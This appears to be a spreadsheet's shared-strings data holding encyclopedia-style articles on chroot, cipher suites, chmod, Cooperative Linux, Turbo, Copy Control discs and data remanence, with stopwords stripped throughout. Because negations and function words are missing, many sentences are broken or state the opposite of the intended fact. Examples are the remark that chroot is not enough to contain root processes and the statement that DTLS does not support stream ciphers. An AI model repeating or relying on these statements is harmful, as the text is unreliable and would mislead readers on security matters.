unnecessary leave working files inside chroot directory. this also simplifies common arrangement running potentially vulnerable parts privileged program sandbox, order pre-emptively contain security breach. note chroot necessarily enough contain process root privileges. limitations chroot mechanism intended defend intentional tampering privileged (root) users. systems, chroot contexts stack properly chrooted programs sufficient privileges perform second chroot break out. mitigate risk security weakness, chrooted programs relinquish root privileges soon practical chrooting, mechanisms freebsd jails used instead. note systems, freebsd, take precautions prevent second chroot attack.on systems support device nodes ordinary filesystems, chrooted root user still create device nodes mount file systems them; thus, chroot mechanism intended used block low-level access system devices privileged users. intended restrict resources like i/o, bandwidth, disk space time. most unixes completely file system-oriented leave potentially disruptive functionality like networking process control available system call interface chrooted program. startup, programs expect find scratch space, configuration files, device nodes shared libraries certain preset locations. chrooted program successfully start, chroot directory must populated minimum files. this make chroot difficult general sandboxing mechanism. tools jailkit help ease automate process. only root user perform chroot. this intended prevent users putting setuid program inside specially crafted chroot jail (for example, fake /etc/passwd /etc/shadow file) would fool privilege escalation. some unixes offer extensions chroot mechanism address least limitations (see implementations operating system-level virtualization technology). graphical applications chroot possible graphical applications chrooted environment, using methods xhost copy secret .xauthority) nested servers like xnest modern xephyr start real server inside jail) accessing chroot using forwarding (ssh feature xchroot extended version chroot users xorg/x11 forwarding (socat/mount) server connecting client outside environment. notable applications postfix mail transfer agent operates pipeline individually chrooted helper programs. like 4.2bsd debian ubuntu internal package-building farms chroots extensively catch unintentional build dependencies packages. suse uses similar method build program. fedora, hat, various rpm-based distributions build rpms using chroot tool mock. many servers posix systems chroot mechanism sandbox untrusted clients. this done forking process handle incoming connection, chrooting child avoid populate chroot libraries required program startup). privilege separation enabled, openssh daemon chroot unprivileged helper process empty directory handle pre-authentication network traffic client. daemon also sandbox sftp shell sessions chroot (from version 4.9p1 onwards).chrome chroot linux instance using crouton, providing otherwise thin access hardware resources. security implications related article apply here. linux host kernel virtual file systems configuration files functional chroot environment linux, kernel virtual file systems configuration files also mounted/copied host chroot. also list unix commands operating system-level virtualization sandbox (computer security) sudo references external links chroot(2): change root directory freebsd system calls manual chroot(8): change root directory freebsd system manager's manual chroot(2): change root directory linux programmer's manual system calls integrating gnu/linux android using chroot</t>
  </si>
  <si>
    <t>Cipher security summary</t>
  </si>
  <si>
    <t>this article summarizes publicly known attacks block ciphers stream ciphers. note perhaps attacks publicly known, entries date. table color best attack this column lists complexity attack: attack break full cipher, "rounds" refers many rounds broken "time" time complexity, number cipher evaluations attacker "data" required known plaintext-ciphertext pairs applicable) "memory" many blocks worth data needs stored applicable) "related keys" related-key attacks, many related queries needed common ciphers plaintext recovery attacks attacks lead disclosure plaintext. distinguishing attacks attacks allow distinguishing ciphertext random data. less common ciphers recovery attacks attacks lead disclosure key. distinguishing attacks attacks allow distinguishing ciphertext random data. also block cipher hash function security summary time/memory/data tradeoff attack transport layer security bullrun (decryption program) secret anti-encryption program u.s. national security agency references</t>
  </si>
  <si>
    <t>Cipher suite</t>
  </si>
  <si>
    <t>cipher suite algorithms help secure network connection. suites typically transport layer security (tls) now-deprecated predecessor secure socket layer (ssl). algorithms cipher suites usually contain include: exchange algorithm, bulk encryption algorithm, message authentication code (mac) algorithm.the exchange algorithm used exchange devices. this used encrypt decrypt messages sent machines. bulk encryption algorithm used encrypt data sent. algorithm provides data integrity checks ensure data sent change transit. addition, cipher suites include signatures authentication algorithm help authenticate server client. overall, hundreds different cipher suites contain different combinations algorithms. some cipher suites offer better security others. structure cipher suite concept defined standard document. prevalent version tls. next version (tls 1.3) includes additional requirements cipher suites. recently standardised widely used. cipher suites defined cannot used 1.3, vice versa, unless otherwise stated definition. reference list named cipher suites provided cipher suite registry. history ciphers part secure socket layer (ssl) transit protocol since creation. succeeded uses. however, name cipher suite used original draft ssl. instead ability client server choose small ciphers secure connection called cipher-choice. (the last version ssl) name cipher suite used. every version since used cipher suite standardization. concept purpose cipher suite changed since term first coined. still used structure describing algorithms machine supports order machines decide algorithms secure connection. what changed versions algorithms supported cipher suites. each version added support stronger versions algorithms removed support versions algorithms identified insecure. marks change cipher suites coordinated machines. cipher suite chosen communicating machines determined handshake process. modifications done handshake process number messages needed sent. this allows less processing, less packet traffic efficiency compared previous versions tls. naming scheme each cipher suite unique name used identify describe algorithmic contents each segment cipher suite name stands different algorithm protocol. example cipher suite name: tls_ecdhe_rsa_with_aes_128_gcm_sha256 meaning name defines protocol cipher suite for; usually tls. ecdhe indicates exchange algorithm used. authentication mechanism handshake. session cipher. session encryption size (bits) cipher. type encryption (cipher-block dependency additional options). (sha2)hash function. digest higher. signature mechanism. indicates message authentication algorithm used authenticate message. digest size (bits). full handshake: coordinating cipher suites cipher suites, client server must agree specific cipher suite going used exchanging messages. both client server must support agreed upon cipher suite. client server agree cipher suite, connection made. this selection process occurs handshake protocol. includes handshake protocol differs compared past current version tls/ssl. after coordinating cipher suite use, server client still ability change coordinated ciphers using changecipherspec protocol current handshake handshake. test ciphers server supports, ssl/tls scanner used.[1] 1.0–1.2 handshake this client starts process sending clienthello message server includes version used list cipher suites order client's preference. response, server sends serverhello message includes chosen cipher suite session next server sends digital certificate verify identity client. server also request client's digital certification needed. client server using pre-shared keys, client sends encrypted message server enables client server compute secret used exchanges. after successfully verifying authentication server and, needed, exchanging secret key, client sends finished message signal done handshake process. after receiving message, server sends finished message confirms handshake complete. client server agreement cipher suite communicate other. handshake machines corresponding 1.3, coordinate cipher suite using handshake protocol. handshake condensed round trip compared round trips required previous versions tls/ssl. first client sends clienthello message server contains list supported ciphers order client's preference makes guess algorithm used send secret share needed. making guess algorithm used eliminates round trip. after receiving clienthello, server sends serverhello key, certificate, chosen cipher suite finished message. after client receives server's finished message coordinated server cipher suite use. supported algorithms 1.0–1.2 information algorithms supported 1.0–1.2, also: transport layer security applications adoption 1.3, many legacy algorithms supported early versions dropped effort make protocol secure. addition, encryption authentication algorithms combined authenticated encryption associated data (aead) encryption algorithm. also hash algorithm must used hmac-based derivation (hkdf). non-aead ciphers removed possible weaknesses vulnerabilities ciphers must ephemeral exchange algorithm pairs generated every exchange. dtls cipher suites datagram transport layer security (dtls) based tls, specifically used connections instead connections. since dtls based able majority cipher suites described tls. there special cases must considered using cipher suites dtls. dtls support stream cipher means cipher using used dtls.to determine cipher suite compatible dtls looking name help. each cipher suite still include identifier space name. e.g.: tls_ecdhe_rsa_with_aes_128_gcm_sha256. instead, parameter registries include flag dtls-ok signal cipher suite supports dtls. vulnerabilities cipher suite secure algorithms contains. version encryption authentication algorithm cipher suite known vulnerabilities cipher suite connection vulnerable. therefore, common attack cipher suites known downgrade attack. downgrade occurs modern client connects legacy servers using older versions ssl. when initiating handshake, modern client offer highest protocol supports. connection fails, automatically retry lower protocol handshake successful server. purpose downgrading versions compatible older versions. however, possible adversary take advantage feature make client automatically downgrade version supports cipher suites algorithms known weak security vulnerabilities. this resulted attacks poodle. avoid security flaw disable ability server client able downgrade 3.0. shortcoming legacy hardware cannot accessed newer hardware. support needed legacy hardware, approved tls_fallback_scsv cipher suite verifies downgrades triggered malicious intentions. cipher suites constrained devices encryption, exchange authentication algorithms usually require large amount processing power memory. provide security constrained devices limited processing power, memory, battery life powering internet things specifically chosen cipher suites. examples include: tls_psk_with_aes_128_ccm_8 (pre-shared key) tls_ecdhe_ecdsa_with_aes_128_ccm_8 (raw public key)each cipher suites implemented devices constraints processing power memory. they implemented open-sourced project tinydtls. reason able work constrained devices implemented light-weight fashion. implementations pre-shared cipher suite used 1889 bytes 38266 flash resource-conscious compared encryption security algorithms. this memory usage cipher suites using proven efficient algorithms secure, maybe secure resource-required algorithms; exp: using encryption encryption. addition pre-shared public requires less memory space processing power compared using traditional public infrastructure (pkix). programming references programming, cipher suite referred plural non-plural forms. each different definitions: ciphersuite cipher_suites list cryptographic options supported client. example cipher_suites usually used handshake process: ciphersuite cipher_suite cipher suite selected server client's cipher_suites. example cipher_suite usually used handshake process: also cryptography data security hardware security module references</t>
  </si>
  <si>
    <t>Chmod</t>
  </si>
  <si>
    <t>unix unix-like operating systems, chmod command system call used change access permissions special mode flags (the setuid, setgid, sticky flags) file system objects (files directories). collectively originally called modes, name chmod chosen abbreviation change mode. history chmod command first appeared at&amp;t unix version along chmod system call. systems grew number types users, access-control lists added many file systems addition basic modes increase flexibility. version chmod bundled coreutils written david mackenzie meyering. command available separate package microsoft windows part unxutils collection native win32 ports common unix-like utilities. chmod command also ported operating system. command syntax throughout section, user refers owner file, reminder symbolic form command uses "u". chmod [options] mode[,mode] file1 [file2 ...]usually implemented options include: recursive, i.e. include objects subdirectories. verbose, show objects changed (unchanged objects shown).if symbolic link specified, target object affected. file modes directly associated symbolic links typically used. view file mode, stat commands used: specify read, write, execute access (the first character display denotes object type; hyphen represents plain file). script findphonenumbers.sh read, written executed user dgerman; read executed members staff group; read users. main parts chmod permissions: example: rwxr-x--- each group three characters define permissions class: three leftmost characters, rwx, define permissions user class (i.e. file owner). middle three characters, r-x, define permissions group class (i.e. group owning file) rightmost three characters, ---, define permissions others class. example, users owner file members group (and, thus, others class) permission access file. numerical permissions chmod numerical format accepts four digits. three rightmost digits define permissions file user, group, others. optional leading digit, digits given, specifies special setuid, setgid, sticky flags. each digit three rightmost digits represents binary value, controls "read", "write" "execute" permissions respectively. value means class allowed action, means disallowed. example, would allow: "read" (4), "write" (2), "execute" user class; i.e., "read" "execute" group class; i.e., only "read" others class.a numerical code permits execution (i.e. numerical code permits "read" greater equal (i.e. numerical code permits "write" numeric example change permissions permit members programmers group update file: since setuid, setgid sticky bits specified, equivalent symbolic modes chmod command also accepts finer-grained symbolic notation, allows modifying specific modes leaving modes untouched. symbolic mode composed three components, combined form single string text: classes users used distinguish permissions apply. classes specified "all" implied. classes represented following letters: chmod program uses operator specify modes file adjusted. following operators accepted: modes indicate permissions granted removed specified classes. there three basic modes correspond basic permissions: multiple changes specified separating multiple symbolic modes commas (without spaces). user specified, chmod check umask effect specified except bits umask affected. symbolic examples write permission group's access modes directory, allowing users group files: remove write permissions classes (a), preventing anyone writing file: permissions user group (ug) read execute (rx) write permission) referencelib, preventing anyone adding files. read write permissions user group classes file directory named sample: remove permissions, allowing read, write, execute file named sample useful end. change permissions user group read execute write permission) sample. special modes chmod command also capable changing additional permissions special modes file directory. symbolic modes represent setuid setgid modes, represent sticky mode. modes applied appropriate classes, regardless whether classes specified. most operating systems support specification special modes numerically, particularly octal, not. systems, symbolic modes used. command line examples also file-system permissions chattr, command used change attributes file directory linux systems chown, command used change owner file directory unix-like systems chgrp, command used change group file directory unix-like systems cacls, command used windows derivatives modify access control lists associated file directory attrib umask, restricts mode (permissions) file directory creation unix-like systems user identifier group identifier list unix commands references external links chmod(1): change file modes freebsd general commands manual chmod(1) plan programmer's manual, volume chmod(1) inferno general commands manual chmod manual page coreutils. "setting permissions" manual chmod-win freeware windows' chmod converter. beginners tutorial on-line "live" example</t>
  </si>
  <si>
    <t>Cooperative Linux</t>
  </si>
  <si>
    <t>cooperative linux, abbreviated colinux, software allows microsoft windows linux kernel simultaneously parallel machine.cooperative linux utilizes concept cooperative virtual machine (cvm). contrast traditional virtual machines, shares resources already exist host traditional hosts, resources virtualized every (guest) gives complete control host machine traditional sets every guest unprivileged state access real machine. overview term "cooperative" used describe entities working parallel. effect cooperative linux turns different operating system kernels coroutines. each kernel complete context address space, kernel decides give control back partner. however, kernels theoretically full access real hardware, modern hardware designed controlled different operating systems time. therefore, host kernel left control real hardware guest kernel contains special drivers communicate host provide various important devices guest host kernel exports basic primitives allow cooperative linux portable driver cpl0 mode (ring allocate memory. history aloni originally started development cooperative linux research project based similar work user-mode linux. announced development 2004. july 2004 presented paper linux symposium. source released general public license. other developers since contributed various patches additions software. comparisons cooperative linux significantly different full virtualization, generally works running guest less privileged mode host kernel, resources delegated host kernel. contrast, cooperative linux runs specially modified linux kernel cooperative takes responsibility sharing resources kernel instigating race conditions. distribution most changes cooperative linux patch i386 tree—the supported architecture cooperative time writing. changes mostly additions virtual drivers: cobd (block device), conet (network), cocon (console). most changes i386 tree involve initialization setup code. goal cooperative linux kernel design remain close possible standalone i386 kernel, changes localized minimized much possible. colinux package installs port linux kernel virtual network device simultaneously version windows operating system windows 2000 windows virtual machine vmware. debian, ubuntu, fedora gentoo especially popular colinux users. rather unusual structure virtual hardware, installing linux distributions colinux generally difficult. therefore, users cases either existing linux installation real partition ready made filesystem image distributed project. filesystem images made variety methods, including taking images normal linux system, finding ways make installers strange hardware, building installs hand using package manager simply upgrading existing images using tools like apt. easier up-to-date filesystem image qemu install linux "convert" image stripping first 512-byte blocks described colinux wiki. since colinux access native graphics hardware, window servers colinux directly, install server windows, cygwin/x xming gnome almost linux application distribution. issues fixed using colinux based distributions andlinux, based ubuntu, topologilinux, based slackware. emulated hardware ethernet network tap, pcap, ndis slirp. limitations does support 64-bit windows linux (nor utilize memory), port development community. sponsor willing complete port, cancelled. multi-processor (smp) support. linux applications underlying kernel able cpu. also win32-loader platform virtualization comparison platform virtualization software cygwin msys wubi (installer) longene chroot windows subsystem linux references external links official website cooperative linux sourceforge colinux github virtualization colinux wayback machine (archived 2008-02-03) speedlinux sourceforge portable ubuntu remix sourceforge</t>
  </si>
  <si>
    <t>Turbo (software)</t>
  </si>
  <si>
    <t>turbo (formerly spoon xenocode) software products services developed code systems corporation application virtualization, portable application creation, digital distribution. code systems corporation american corporation headquartered seattle, washington, best known turbo products include browser sandbox, turbo studio, turboserver, turbo. kenji obata founded code systems corporation 2006 introduced turbo’s precursor, xenocode. xenocode early application virtualization engine windows platform. obata serves corporation, become commonly known spoon since rebranding 2010. turbo’s tools package conventional software applications microsoft windows portable application format delivered single executable streamed web. files settings automatically synchronize across devices turbo’s patented virtualization technology allows access local files printers web-based applications. about company obata graduated yale university 1999 bachelor science computer science mathematics (summa laude). spent several years development lead microsoft corporation attending university california, berkeley obtain ph.d. computer science. after receiving ph.d., obata returned seattle 2006 grow company. from 2006 2009, code systems corporation developed xenocode, first application virtualization engines windows platform. product focused application deployment preconfigured executables. spoon launched 2010 reintroduction xenocode’s virtualization engines. turbo’s technology combines application storage virtualization web-based network synchronization protocols, machine learning algorithms, semistructured large data storage systems. turbo.net virtual applications isolated sandboxes, allowing multiple application versions simultaneously without conflict. turbo.net uses technologies scala, akka, lift, build website server systems. turbo technology used educational, entertainment, financial, government, health care, information technology organizations. turbo’s customer base consists tens thousands organizations millions users. products include solutions enterprise software distribution; development testing tools browser sandbox, browser studio, turbo; free accounts allow users stream hundreds brand-name applications like skype, chrome, firefox without installing them. accounts also come cloud storage hosted turbo.net. turbo headquartered seattle, profitable employee-owned, adds thousands users week. turbo.net turbo.net, official website turbo, hosts applications launched installation. turbo’s application library includes popular software like chrome, skype, media player, sketchup, hundreds free open-source applications. turbo works small browser plugin administrative privileges drivers required. addition functioning tool individuals, turbo often used professionals work multiple desktops, small businesses teams requiring collaboration, larger enterprises distributed remote workforces. introduction turbo, combines selenium turbo browsers unlimited automated browser testing, increased turbo’s utilization development testing tool. turbo works materializing virtual environment endpoint device, transferring application components required execution, capturing application interactions storage system sandbox, synchronizing sandbox contents back cloud. turbo virtual machine (svm) lightweight implementation core operating system apis, including filesystem, registry, process, threading subsystems; completely implemented within windows user-mode space. applications executing within turbo virtual environment interact virtualized filesystem, registry, process environment, rather directly host device operating system. virtualization engine handles requests within virtualized environment internally appropriate, routes requests host device filesystem registry, possibly redirecting overriding requests determined virtual application configuration. cross-browser testing browser sandbox turbo.net hosts browsersandbox.com, allows users multiple versions browsers internet explorer, google chrome, mozilla firefox, opera, mobile browsers single machine. developers browser sandbox cross-browser testing ensure websites function correctly multiple versions popular browsers.virtualized browsers behave exactly like installed browsers, locally, applications tests hosted user’s development machine internal servers. turbo.net supports standard browser components like java applets activex controls well popular browser plugins like firebug, developer toolbar, javascript debugging consoles. library similar browser sandbox, turbo hosts extensive application library filled hundreds free open-source applications turbo streams users. library part turbo’s free basic account lets anyone stream full desktop applications like skype, google chrome, media player, sublime text, notepad++, gimp without installing them. turbo virtual applications need accessed browser. users turbo’s plugin press [alt+win] bring spoon console, acts alternate start menu launch local virtualized applications files. turbo claims running applications virtual sandboxes faster, safer, portable installing locally. software turbo studio turbo studio (formerly spoon studio xenocode virtual application studio) application virtualization tool runs microsoft windows. tool packages software applications portable applications; single executable files instantly windows computer. turbo studio emulates operating system features necessary applications therefore reduces resource overhead. turbo studio allows user convert existing applications virtual applications. deployment models include standalone exe, package, http-based delivery turbo browser plugin. turbo studio packages application files, settings, runtimes, components single package runs instantly zero setup. turbo virtual machine (svm) supports versions .net framework java, thus allowing users execute .net, java, air-based applications separate installations. turbo allows legacy software properly operating systems, thereby reducing cost risk associated operating system rollouts. turbo virtualization engine class support virtualization 64-bit applications; system services databases server; advanced software technologies dcom sxs. fully user-mode implementation eliminates need device drivers, reboots, administrative privileges. turboserver turboserver (formerly spoon server) application deployment platform allows software packaged turbo studio deployed, patched, managed web. users website browser able launch desktop-level applications like microsoft word photoshop without install them. private version turbo.net service. applications streamed user desktops clean desktops without administrative privileges. desktops re-imaged locked-down. turboserver includes additional administrative features ad/ldap integration, user group application access control, usage logging, analytics. turbo turbo (formerly spoonium) platform tools allows users package windows desktop applications dependencies software containers. application containers made turbo windows machine without installers, breaks, dependencies. containers used streamline software development life cycle. developers ensure applications intended including specific dependencies within containers. software testers rapidly pull test software without install dependencies, test multiple application versions side-by-side, return application containers development teams specific states. system administrators reduce failures differences development, testing, production, end-user environments. turbo’s service currently open beta. also vmware thinapp windows references</t>
  </si>
  <si>
    <t>Copy Control</t>
  </si>
  <si>
    <t>copy control generic name copy prevention system, used 2001 2006 several digital audio disc releases group sony music entertainment several regions (europe, canada, united states, australia). confused copycontrol computer software copy protection system introduced microcosm 1989. several types protection existed. while basically intended means copy-protecting compact discs, copy control discs cannot properly referred system introduces incompatible data, making discs non-compliant book standard audio cds. system intended prevent digital audio extraction ("ripping") protected discs, thus limit file sharing ripped music. techniques used are: multisession (blue book) information included effectively hides audio tracks cd-rom drives; error-correction codes audio data corrupted, introduce audible errors ripped copies. data area disc usually includes drm-restricted copies audio content, player exists dominant operating system, microsoft windows.in netherlands, record labels sony universal experimented copy control 2004. kept using june 2006, dropped united states, universal music group experimented copy control soundtracks 2001 2002, abandoned afterwards; warner music group used europe releases chili peppers' greatest hits madonna music. september 2006, cactus data shield, macrovision technology behind copy control, longer listed product macrovision's website completely abandoned countries australia.a december 2006 issue billboard magazine announced decided abandon copy control worldwide. until then, unclear whether completely abandoned there press release. background copy control protections devised response file sharing casual copying become commonplace recent years, allegedly causing music industry significant losses, "ungained" revenues. neither issue particularly relevant standard introduced early 1980s, thus, unlike recent dvds, standard specifies inherent form copy protection digital rights management. copy control number attempts apply copy protection standard, since merely modification already unrestricted standard must still yield usable results players, efficacy system varies significantly. nevertheless, emi's labelling copy controlled discs attempted override consumers' statutory rights disclaimer "except defective product resulting manufacturing process, exchange, return refund permitted". circumvention copy control disc appear mixed-mode disc, audio data content. under windows, inserting disc usually autorun audio player utility, plays drm-protected audio files provided. this temporarily disabled holding shift inserting disc windows earlier, users windows vista simply choose content. ability extract cd-audio tracks otherwise largely dependent disc drive used. first obstacle "fake" table contents (toc), intended mask audio tracks cd-rom drives. however cd-r/rw drives, similar, usually access session data disc, thus properly read audio segment. major obstacle incompatible (and technically corrupted) error-correction data. again, effect dependent disc drive; drives able read data without problems, others produce audio files loud pops every seconds. consequence faulty error-correction codes, discs less resilient anything might cause read error, dust scratches resulting normal use. copy control also prevent copying disc recording analog audio computer's sound card, causes slight degradation audio quality. more substantial loss recording speed. this weakness, inherent digital copy prevention systems, known "analog hole". alternative rely "analog hole", possible copy content using digital link playing sound card digital audio intput. usually cd-r/rw drive play disc occasional stops (about every seconds) dvd-r/rw drives able read data without problems ripped straight cd-rom dvd-rom drives computer usually refuse play data except provided player. systems windows easily play copy control discs, many players windows proprietary respect copy-restrictions. similarly, auto-launchers written windows ambush windows users (this mitigated disabling autorun). there little done stop user running windows using non-microsoft ripping software ripping copy control disc. linux, copy control discs easily accessed cdparanoia software uses "audiocd:/" service. discs easily accessed itunes quicktime (when cdda track dragged folder quicktime automatically converts aiff, lossless format). content extra cds-100 cds-200 player media file database copy audio contents windows media). player play audio contents media file database. cds-300 player anti-copy program only. player ignore anti-copy program read audio tracks. player allow users play tracks, audio tracks drm-enabled files burn times (the player kbit/s files, burn audio cd-r, notice volume lower quality worse burned cd). also copy protection audio mediamax cd-3 key2audio extended copy protection sony copy protection rootkit scandal references external links emi: "copy control facts" (archived content) disc playback problems questions answers (archived content) consumer petition copy control ifpi press release ifpi issues labeling guidelines copy control discs evaluating copy-prevention techniques audio (pdf format), alex halderman padawan.info: protected judged abusive france guide copying copy-protected music discs music sony/bmg anti-copy control information wayback machine (archived 2008) publishers copyright infringement protection facts faqs cccds avex group, first company release cccds japan japanese)</t>
  </si>
  <si>
    <t>Data redundancy</t>
  </si>
  <si>
    <t>computer main memory, auxiliary storage computer buses, data redundancy existence data additional actual data permits correction errors stored transmitted data. additional data simply complete copy actual data type repetition code), select pieces data allow detection errors reconstruction lost damaged data certain level. example, including additional data checksums, memory capable detecting correcting single-bit errors within memory word, raid combines hard disk drives (hdds) logical storage unit allows stored data survive complete failure drive. data redundancy also used measure silent data corruption; example, file systems btrfs data metadata checksumming combination copies stored data detect silent data corruption repair effects. database systems while different nature, data redundancy also occurs database systems values repeated unnecessarily records fields, within table, field replicated/repeated tables. often found unnormalized database designs results complication database management, introducing risk corrupting data, increasing required amount storage. when done purpose previously normalized database schema, considered form database denormalization; used improve performance database queries (shorten database response time). instance, customer data duplicated attached product bought, redundancy data known source inconsistency since given customer might appear different values attributes. data redundancy leads data anomalies corruption generally avoided design; applying database normalization prevents redundancy makes best possible usage storage. also data maintenance data deduplication data scrubbing end-to-end data protection redundancy (engineering) redundancy (information theory) references</t>
  </si>
  <si>
    <t>Data remanence</t>
  </si>
  <si>
    <t>data remanence residual representation digital data remains even attempts made remove erase data. this residue result data left intact nominal file deletion operation, reformatting storage media remove data previously written media, physical properties storage media allow previously written data recovered. data remanence make inadvertent disclosure sensitive information possible storage media released uncontrolled environment (e.g., thrown (trash) lost). various techniques developed counter data remanence. these techniques classified clearing, purging/sanitizing, destruction. specific methods include overwriting, degaussing, encryption, media destruction. effective application countermeasures complicated several factors, including media inaccessible, media cannot effectively erased, advanced storage systems maintain histories data throughout data's life cycle, persistence data memory typically considered volatile. several standards exist secure removal data elimination data remanence. causes many operating systems, file managers, software provide facility file immediately deleted user requests action. instead, file moved holding area (i.e. “trash”), making easy user undo mistake. similarly, many software products automatically create backup copies files edited, allow user restore original version, recover possible crash (autosave feature). even explicit deleted file retention facility provided user operating systems actually remove contents file deleted unless aware explicit erasure commands required, like solid-state drive. cases, operating system issue serial trim command scsi unmap command drive know longer maintain deleted data.) instead, simply remove file's entry file system directory requires less work therefore faster, contents file—the actual data—remain storage medium. data remain operating system reuses space data. systems, enough filesystem metadata also left behind enable easy undeletion commonly available utility software. even undelete become impossible, data, overwritten, read software reads disk sectors directly. computer forensics often employs software. likewise, reformatting, repartitioning, reimaging system unlikely write every area disk, though cause disk appear empty case reimaging, empty except files present image, software. finally, even storage media overwritten, physical properties media permit recovery previous contents. cases however, recovery possible reading storage device usual way, requires using laboratory techniques disassembling device directly accessing/reading components. section complications gives explanations causes data remanence. countermeasures there three levels commonly recognized eliminating remnant data: clearing clearing removal sensitive data storage devices assurance data reconstructed using normal system functions software file/data recovery utilities. data still recoverable, without special laboratory techniques.clearing typically administrative protection accidental disclosure within organization. example, hard drive re-used within organization, contents cleared prevent accidental disclosure next user. purging purging sanitizing physical rewrite sensitive data system storage device intent data cannot recovered. purging, proportional sensitivity data, generally done releasing media beyond control, discarding media, moving media computer different security requirements. destruction storage media made unusable conventional equipment. effectiveness destroying media varies medium method. depending recording density media, and/or destruction technique, leave data recoverable laboratory methods. conversely, destruction using appropriate techniques secure method preventing retrieval. specific methods overwriting common method used counter data remanence overwrite storage media data. this often called wiping shredding file disk, analogy common methods destroying print media, although mechanism bears similarity these. because method often implemented software alone, able selectively target part media, popular, low-cost option applications. overwriting generally acceptable method clearing, long media writable damaged. simplest overwrite technique writes data everywhere—often pattern zeros. minimum, prevent data retrieved simply reading media using standard system functions. attempt counter advanced data recovery techniques, specific overwrite patterns multiple passes often prescribed. these generic patterns intended eradicate trace signatures, example, seven-pass pattern: 0xf6, 0x00, 0xff, random, 0x00, 0xff, random; sometimes erroneously attributed standard 5220.22-m. challenge overwriting areas disk inaccessible, media degradation errors. software overwrite also problematic high-security environments, require stronger controls data commingling provided software use. advanced storage technologies also make file-based overwrite ineffective (see discussion complications). there specialized machines software capable overwriting. software sometimes standalone operating system specifically designed data destruction. there also machines specifically designed wipe hard drives department defense specifications 5220.22-m. feasibility recovering overwritten data peter gutmann investigated data recovery nominally overwritten media mid-1990s. suggested magnetic force microscopy able recover data, developed specific patterns, specific drive technologies, designed counter such. these patterns come known gutmann method. daniel feenberg, economist private national bureau economic research, claims chances overwritten data recovered modern hard drive amount “urban legend”. also points “18+1⁄2-minute gap” rose mary woods created tape richard nixon discussing watergate break-in. erased information recovered, feenberg claims would easy task compared recovery modern high density digital signal. november 2007, united states department defense considers overwriting acceptable clearing magnetic media within security area/zone, sanitization method. only degaussing physical destruction acceptable latter.on hand, according 2014 nist special publication 800-88 rev. “for storage devices containing magnetic media, single overwrite pass fixed pattern binary zeros typically hinders recovery data even state laboratory techniques applied attempt retrieve data.” analysis wright recovery techniques, including magnetic force microscopy, also concludes single wipe required modern drives. they point long time required multiple wipes “has created situation many organizations ignore issue [altogether] resulting data leaks loss.” degaussing degaussing removal reduction magnetic field disk drive, using device called degausser designed media erased. applied magnetic media, degaussing purge entire media element quickly effectively. degaussing often renders hard disks inoperable, erases low-level formatting done factory manufacturing. cases, possible return drive functional state serviced manufacturer. however, modern degaussers strong magnetic pulse motor spins platters destroyed degaussing process, servicing cost-effective. degaussed computer tape generally reformatted reused standard consumer hardware. high-security environments, required degausser approved task. example, government military jurisdictions, required degausser nsa's “evaluated products list”. encryption encrypting data stored media mitigate concerns data remanence. decryption strong carefully controlled, effectively make data media unrecoverable. even stored media, prove easier quicker overwrite key, versus entire disk. this process called crypto-shredding. encryption done file-by-file basis, whole disk. cold boot attacks possible methods subverting full-disk encryption method, possibility storing plain text unencrypted section medium. section complications: data discussion. other side-channel attacks (such keyloggers, acquisition written note containing decryption key, rubber-hose cryptanalysis) offer greater chance success, rely weaknesses cryptographic method employed. such, relevance article minor. media destruction thorough destruction underlying storage media certain counter data remanence. however, process generally time-consuming, cumbersome, require extremely thorough methods, even small fragment media contain large amounts data. specific destruction techniques include: physically breaking media apart (e.g., grinding shredding) chemically altering media non-readable, non-reverse-constructible state (e.g., incineration exposure caustic/corrosive chemicals) phase transition (e.g., liquefaction vaporization solid disk) magnetic media, raising temperature curie point many electric/electronic volatile non-volatile storage media, exposure electromagnetic fields greatly exceeding safe operational specifications (e.g., high-voltage electric current high-amplitude microwave ionizing radiation) complications inaccessible media areas storage media areas become inaccessible normal means. example, magnetic disks develop sectors data written, tapes require inter-record gaps. modern hard disks often feature reallocation marginal sectors tracks, automated operating system would need work problem especially significant solid-state drives (ssds) rely relatively large relocated block tables. attempts counter data remanence overwriting successful situations, data remnants persist nominally inaccessible areas. advanced storage systems data storage systems sophisticated features make overwrite ineffective, especially per-file basis. example, journaling file systems increase integrity data recording write operations multiple locations, applying transaction-like semantics; systems, data remnants exist locations “outside” nominal file storage location. some file systems also implement copy-on-write built-in revision control, intent writing file never overwrites data in-place. furthermore, technologies raid anti-fragmentation techniques result file data written multiple locations, either design (for fault tolerance), data remnants. wear leveling also defeat data erasure, relocating blocks time originally written time overwritten. reason, security protocols tailored operating systems software featuring automatic wear leveling recommend conducting free-space wipe given drive copying many small, easily identifiable “junk” files files containing nonsensitive data fill much drive possible, leaving amount free space necessary satisfactory operation system hardware software. storage system demands grow, “junk data” files deleted necessary free space; even deletion “junk data” files secure, initial nonsensitivity reduces near zero consequences recovery data remanent them. optical media optical media magnetic, erased conventional degaussing. write-once optical media (cd-r, dvd-r, etc.) also cannot purged overwriting. rewritable optical media, cd-rw dvd-rw, receptive overwriting. methods successfully sanitizing optical discs include delaminating abrading metallic data layer, shredding, incinerating, destructive electrical arcing exposure microwave energy), submersion polycarbonate solvent (e.g., acetone). data solid-state drives research center magnetic recording research, university california, diego uncovered problems inherent erasing data stored solid-state drives (ssds). researchers discovered three problems file storage ssds: first, built-in commands effective, manufacturers sometimes implement incorrectly. second, overwriting entire visible address space twice usually, always, sufficient sanitize drive. third, none existing hard drive-oriented techniques individual file sanitization effective ssds.: solid-state drives, flash-based, differ hard-disk drives ways: first, data stored; second, algorithms used manage access data. these differences exploited recover previously erased data. ssds maintain layer indirection logical addresses used computer systems access data internal addresses identify physical storage. this layer indirection hides idiosyncratic media interfaces enhances performance, reliability, lifespan (see wear leveling), also produce copies data invisible user sophisticated attacker could recover. sanitizing entire disks, sanitize commands built hardware found effective implemented correctly, software-only techniques sanitizing entire disks found work most, all, time.: section testing, none software techniques effective sanitizing individual files. these included well-known algorithms gutmann method, 5220.22-m, rcmp tssit ops-ii, schneier pass, secure empty trash macos feature included versions 10.3-10.9).: section trim feature many devices, properly implemented, eventually erase data deleted process take time, typically several minutes. many older operating systems support feature, combinations drives operating systems work. data data remanence observed static random-access memory (sram), typically considered volatile (i.e., contents degrade loss external power). study, data retention observed even room temperature.data remanence also observed dynamic random-access memory (dram). modern dram chips built-in self-refresh module, require power supply retain data, must also periodically refreshed prevent data contents fading away capacitors integrated circuits. study found data remanence dram data retention seconds minutes room temperature full week without refresh cooled liquid nitrogen.” study authors able cold boot attack recover cryptographic keys several popular full disk encryption systems, including microsoft bitlocker, apple filevault, dm-crypt linux, 